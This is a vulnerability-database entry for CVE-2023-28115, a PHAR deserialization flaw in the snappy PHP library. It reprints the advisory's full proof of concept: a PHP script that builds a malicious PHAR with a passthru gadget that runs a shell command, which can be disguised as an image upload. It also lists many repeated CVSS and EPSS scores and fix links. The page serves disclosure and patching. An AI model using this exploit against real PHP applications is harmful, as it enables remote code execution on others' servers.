Search for vulnerabilities
Vulnerability details: VCID-r9m5-vhxg-e7ew
Vulnerability ID VCID-r9m5-vhxg-e7ew
Aliases CVE-2023-28115
GHSA-gq6w-q6wh-jggc
Summary PHAR deserialization allowing remote code execution ## Description snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. ## Proof of Concept Install Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code. ```php <?php // index.php // include autoloader require __DIR__ . '/vendor/autoload.php'; // reference the snappy namespace use Knp\Snappy\Pdf; // vulnerable object class VulnerableClass { public $fileName; public $callback; function __destruct() { call_user_func($this->callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php <?php // generate_phar.php class VulnerableClass { } // Create a new instance of the Dummy class and modify its property $dummy = new VulnerableClass(); $dummy->callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); // Add a new file in the archive with "text" as its content $poc["file"] = "text"; // Add the dummy object to the metadata. This will be serialized $poc->setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?> ``` Then run these command to generate the file ```php php --define phar.readonly=0 generate_phar.php ``` Then execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick. ## Impact This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. ## Occurences <https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670> ## References - <https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/>
Status Published
Exploitability 0.5
Weighted Severity 9.0
Risk 4.5
Affected and Fixed Packages Package Details
Weaknesses (4)
System Score Found at
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.17677 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
epss 0.1985 https://api.first.org/data/v1/epss?cve=CVE-2023-28115
cvssv3.1 9.8 https://github.com/advisories/GHSA-gq6w-q6wh-jggc
cvssv3.1_qr CRITICAL https://github.com/advisories/GHSA-gq6w-q6wh-jggc
generic_textual CRITICAL https://github.com/advisories/GHSA-gq6w-q6wh-jggc
cvssv3.1 9.8 https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml
generic_textual CRITICAL https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml
cvssv3.1 9.8 https://github.com/KnpLabs/snappy
generic_textual CRITICAL https://github.com/KnpLabs/snappy
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
generic_textual CRITICAL https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
ssvc Track https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
generic_textual CRITICAL https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
ssvc Track https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
generic_textual CRITICAL https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
ssvc Track https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/pull/469
generic_textual CRITICAL https://github.com/KnpLabs/snappy/pull/469
ssvc Track https://github.com/KnpLabs/snappy/pull/469
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/releases/tag/v1.4.2
generic_textual CRITICAL https://github.com/KnpLabs/snappy/releases/tag/v1.4.2
ssvc Track https://github.com/KnpLabs/snappy/releases/tag/v1.4.2
cvssv3.1 9.8 https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
cvssv3.1_qr CRITICAL https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
generic_textual CRITICAL https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
ssvc Track https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
cvssv3.1 9.8 https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e
generic_textual CRITICAL https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e
cvssv3.1 9.8 https://nvd.nist.gov/vuln/detail/CVE-2023-28115
generic_textual CRITICAL https://nvd.nist.gov/vuln/detail/CVE-2023-28115
No exploits are available.
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/advisories/GHSA-gq6w-q6wh-jggc
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/pull/469
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/pull/469
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/releases/tag/v1.4.2
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/releases/tag/v1.4.2
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none


Vector: SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:03Z/ Found at https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2023-28115
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Exploit Prediction Scoring System (EPSS)
Percentile 0.94821
EPSS Score 0.17677
Published At Aug. 6, 2025, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2025-07-31T08:43:46.581906+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-gq6w-q6wh-jggc/GHSA-gq6w-q6wh-jggc.json 37.0.0